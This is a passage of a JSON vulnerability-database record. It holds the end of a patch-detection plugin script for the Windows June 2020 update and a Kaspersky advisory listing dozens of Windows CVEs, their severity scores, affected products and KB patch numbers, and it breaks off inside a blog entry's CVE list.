exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18362',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4560960]) ||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4560960])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-17T03:22:39", "bulletinFamily": "info", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1275", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1273", "CVE-2020-1284", "CVE-2020-1120", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1307", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1209", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1313", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1265", "CVE-2020-1268", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1206", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1248", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "description": "### *Detect date*:\n06/09/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, cause denial of service, bypass security restrictions.\n\n### *Affected products*:\nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server, version 1803 (Server Core Installation) \nWindows Server 2012 R2 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nMicrosoft Visual Studio 2019 version 16.6 (includes 16.0 - 16.5) \nMicrosoft Visual Studio 2015 Update 3 \nWindows Server 2019 \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nMicrosoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1903 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nMicrosoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1803 for ARM64-based Systems \nMicrosoft Visual Studio 2019 version 16.0 \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2012 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows RT 8.1 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2016 \nWindows 10 Version 2004 for HoloLens \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1903 for HoloLens \nWindows 10 Version 1809 for HoloLens \nWindows Server 2012 R2 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server, version 1903 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0986](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0986>) \n[CVE-2020-1348](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1348>) \n[CVE-2020-1264](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1264>) \n[CVE-2020-1265](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1265>) \n[CVE-2020-1266](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1266>) \n[CVE-2020-1261](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1261>) \n[CVE-2020-1262](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1262>) \n[CVE-2020-1263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1263>) \n[CVE-2020-1268](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1268>) \n[CVE-2020-1269](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1269>) \n[CVE-2020-1299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1299>) \n[CVE-2020-1291](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1291>) \n[CVE-2020-1290](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1290>) \n[CVE-2020-1293](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1293>) \n[CVE-2020-1292](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1292>) \n[CVE-2020-1294](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1294>) \n[CVE-2020-1296](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1296>) \n[CVE-2020-1160](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1160>) \n[CVE-2020-1259](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1259>) \n[CVE-2020-1311](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1311>) \n[CVE-2020-1211](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1211>) \n[CVE-2020-1162](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1162>) \n[CVE-2020-1212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1212>) \n[CVE-2020-1217](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1217>) \n[CVE-2020-1282](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1282>) \n[CVE-2020-1283](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1283>) \n[CVE-2020-1280](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1280>) \n[CVE-2020-1281](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1281>) \n[CVE-2020-1286](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1286>) \n[CVE-2020-1287](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1287>) \n[CVE-2020-1284](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1284>) \n[CVE-2020-1202](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1202>) \n[CVE-2020-1203](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1203>) \n[CVE-2020-1201](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1201>) \n[CVE-2020-1206](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1206>) \n[CVE-2020-1207](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1207>) \n[CVE-2020-1204](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1204>) \n[CVE-2020-1324](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1324>) \n[CVE-2020-1208](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1208>) \n[CVE-2020-1209](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1209>) \n[CVE-2020-1239](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1239>) \n[CVE-2020-1238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1238>) \n[CVE-2020-1237](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1237>) \n[CVE-2020-1236](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1236>) \n[CVE-2020-1235](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1235>) \n[CVE-2020-1234](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1234>) \n[CVE-2020-1233](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1233>) \n[CVE-2020-1232](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1232>) \n[CVE-2020-1231](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1231>) \n[CVE-2020-1334](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1334>) \n[CVE-2020-1222](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1222>) \n[CVE-2020-1309](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1309>) \n[CVE-2020-1302](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1302>) \n[CVE-2020-1301](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1301>) \n[CVE-2020-1300](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1300>) \n[CVE-2020-1307](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1307>) \n[CVE-2020-1306](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1306>) \n[CVE-2020-1305](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1305>) \n[CVE-2020-1304](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1304>) \n[CVE-2020-1196](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1196>) \n[CVE-2020-1197](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1197>) \n[CVE-2020-1194](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1194>) \n[CVE-2020-1199](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1199>) \n[CVE-2020-1120](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1120>) \n[CVE-2020-1314](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1314>) \n[CVE-2020-1316](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1316>) \n[CVE-2020-1317](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1317>) \n[CVE-2020-1310](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1310>) \n[CVE-2020-1258](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1258>) \n[CVE-2020-1312](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1312>) \n[CVE-2020-1313](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1313>) \n[CVE-2020-1255](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1255>) \n[CVE-2020-1254](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1254>) \n[CVE-2020-1257](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1257>) \n[CVE-2020-1251](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1251>) \n[CVE-2020-1253](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1253>) \n[CVE-2020-1248](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1248>) \n[CVE-2020-1246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1246>) \n[CVE-2020-1247](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1247>) \n[CVE-2020-1244](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1244>) \n[CVE-2020-1241](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1241>) \n[CVE-2020-0915](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0915>) \n[CVE-2020-0916](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0916>) \n[CVE-2020-1279](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1279>) \n[CVE-2020-1278](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1278>) \n[CVE-2020-1273](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1273>) \n[CVE-2020-1272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1272>) \n[CVE-2020-1271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1271>) \n[CVE-2020-1270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1270>) \n[CVE-2020-1277](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1277>) \n[CVE-2020-1276](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1276>) \n[CVE-2020-1275](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1275>) \n[CVE-2020-1274](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1274>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *CVE-IDS*:\n[CVE-2020-1160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1160>)2.1Warning \n[CVE-2020-1281](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1281>)6.8High \n[CVE-2020-1287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1287>)6.8High \n[CVE-2020-1348](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1348>)4.3Warning \n[CVE-2020-1301](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1301>)6.5High \n[CVE-2020-1207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1207>)7.2High \n[CVE-2020-1262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1262>)7.2High \n[CVE-2020-1263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1263>)2.1Warning \n[CVE-2020-1246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1246>)7.2High \n[CVE-2020-1247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1247>)7.2High \n[CVE-2020-1208](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1208>)9.3Critical \n[CVE-2020-1300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1300>)6.8High \n[CVE-2020-1196](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1196>)4.6Warning \n[CVE-2020-1194](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1194>)4.9Warning \n[CVE-2020-1299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1299>)9.3Critical \n[CVE-2020-1291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1291>)6.8High \n[CVE-2020-1317](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1317>)9.0Critical \n[CVE-2020-1239](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1239>)6.8High \n[CVE-2020-1236](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1236>)9.3Critical \n[CVE-2020-1314](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1314>)6.8High \n[CVE-2020-1212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1212>)6.8High \n[CVE-2020-1311](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1311>)6.8High \n[CVE-2020-1255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1255>)6.5High \n[CVE-2020-1254](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1254>)7.2High \n[CVE-2020-1271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1271>)4.6Warning \n[CVE-2020-1270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1270>)4.6Warning \n[CVE-2020-1251](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1251>)7.2High \n[CVE-2020-1253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1253>)7.2High \n[CVE-2020-1272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1272>)7.2High \n[CVE-2020-1302](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1302>)4.6Warning \n[CVE-2020-0986](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0986>)7.2High \n[CVE-2020-1264](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1264>)4.6Warning \n[CVE-2020-1265](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1265>)4.6Warning \n[CVE-2020-1266](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1266>)7.2High \n[CVE-2020-1261](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1261>)2.1Warning \n[CVE-2020-1268](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1268>)2.1Warning \n[CVE-2020-1269](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1269>)7.2High \n[CVE-2020-1290](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1290>)2.1Warning \n[CVE-2020-1293](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1293>)4.6Warning \n[CVE-2020-1292](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1292>)6.8High \n[CVE-2020-1294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1294>)6.8High \n[CVE-2020-1296](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1296>)2.1Warning \n[CVE-2020-1259](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1259>)4.0Warning \n[CVE-2020-1211](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1211>)6.8High \n[CVE-2020-1162](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1162>)4.6Warning \n[CVE-2020-1217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1217>)6.8High \n[CVE-2020-1282](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1282>)6.8High \n[CVE-2020-1283](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1283>)7.1High \n[CVE-2020-1280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1280>)6.8High \n[CVE-2020-1286](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1286>)9.3Critical \n[CVE-2020-1284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1284>)4.3Warning \n[CVE-2020-1202](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1202>)7.2High \n[CVE-2020-1203](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1203>)7.2High \n[CVE-2020-1201](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1201>)7.2High \n[CVE-2020-1206](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1206>)5.0Critical \n[CVE-2020-1204](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1204>)3.6Warning \n[CVE-2020-1324](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1324>)4.6Warning \n[CVE-2020-1209](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1209>)6.8High \n[CVE-2020-1238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1238>)6.8High \n[CVE-2020-1237](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1237>)6.8High \n[CVE-2020-1235](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1235>)6.8High \n[CVE-2020-1234](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1234>)6.8High \n[CVE-2020-1233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1233>)6.8High \n[CVE-2020-1232](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1232>)4.3Warning \n[CVE-2020-1231](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1231>)6.8High \n[CVE-2020-1334](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1334>)4.6Warning \n[CVE-2020-1222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1222>)4.6Warning \n[CVE-2020-1309](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1309>)6.8High \n[CVE-2020-1307](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1307>)9.3Critical \n[CVE-2020-1306](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1306>)4.6Warning \n[CVE-2020-1305](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1305>)6.8High \n[CVE-2020-1304](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1304>)6.8High \n[CVE-2020-1197](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1197>)7.2High \n[CVE-2020-1199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1199>)7.2High \n[CVE-2020-1120](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1120>)4.9Warning \n[CVE-2020-1316](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1316>)7.2High \n[CVE-2020-1310](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1310>)7.2High \n[CVE-2020-1258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1258>)7.2High \n[CVE-2020-1312](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1312>)4.6Warning \n[CVE-2020-1313](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1313>)6.8High \n[CVE-2020-1257](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1257>)4.6Warning \n[CVE-2020-1248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1248>)9.3Critical \n[CVE-2020-1244](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1244>)5.8High \n[CVE-2020-1241](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1241>)6.8High \n[CVE-2020-0915](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0915>)7.2High \n[CVE-2020-0916](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0916>)7.2High \n[CVE-2020-1279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1279>)4.6Warning \n[CVE-2020-1278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1278>)4.6Warning \n[CVE-2020-1273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1273>)4.6Warning \n[CVE-2020-1277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1277>)4.6Warning \n[CVE-2020-1276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1276>)4.6Warning \n[CVE-2020-1275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1275>)4.6Warning \n[CVE-2020-1274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1274>)4.6Warning\n\n### *KB list*:\n[4549951](<http://support.microsoft.com/kb/4549951>) \n[4556799](<http://support.microsoft.com/kb/4556799>) \n[4561669](<http://support.microsoft.com/kb/4561669>) \n[4561645](<http://support.microsoft.com/kb/4561645>) \n[4561643](<http://support.microsoft.com/kb/4561643>) \n[4561670](<http://support.microsoft.com/kb/4561670>) \n[4561649](<http://support.microsoft.com/kb/4561649>) \n[4560960](<http://support.microsoft.com/kb/4560960>) \n[4557957](<http://support.microsoft.com/kb/4557957>) \n[4561666](<http://support.microsoft.com/kb/4561666>) \n[4561602](<http://support.microsoft.com/kb/4561602>) \n[4561612](<http://support.microsoft.com/kb/4561612>) \n[4561674](<http://support.microsoft.com/kb/4561674>) \n[4561616](<http://support.microsoft.com/kb/4561616>) \n[4561608](<http://support.microsoft.com/kb/4561608>) \n[4561621](<http://support.microsoft.com/kb/4561621>) \n[4561673](<http://support.microsoft.com/kb/4561673>) \n[4562053](<http://support.microsoft.com/kb/4562053>) \n[4570333](<http://support.microsoft.com/kb/4570333>) \n[4574727](<http://support.microsoft.com/kb/4574727>)\n\n### *Microsoft official advisories*:", "edition": 2, "modified": "2020-09-10T00:00:00", "published": "2020-06-09T00:00:00", "id": "KLA11807", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11807", "title": "\r KLA11807Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2020-08-07T08:03:36", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0796", "CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1120", "CVE-2020-1148", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1163", "CVE-2020-1170", "CVE-2020-1177", "CVE-2020-1178", "CVE-2020-1181", "CVE-2020-1183", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1199", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1204", "CVE-2020-1206", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1209", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1221", "CVE-2020-1222", "CVE-2020-1223", "CVE-2020-1225", "CVE-2020-1226", "CVE-2020-1229", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", 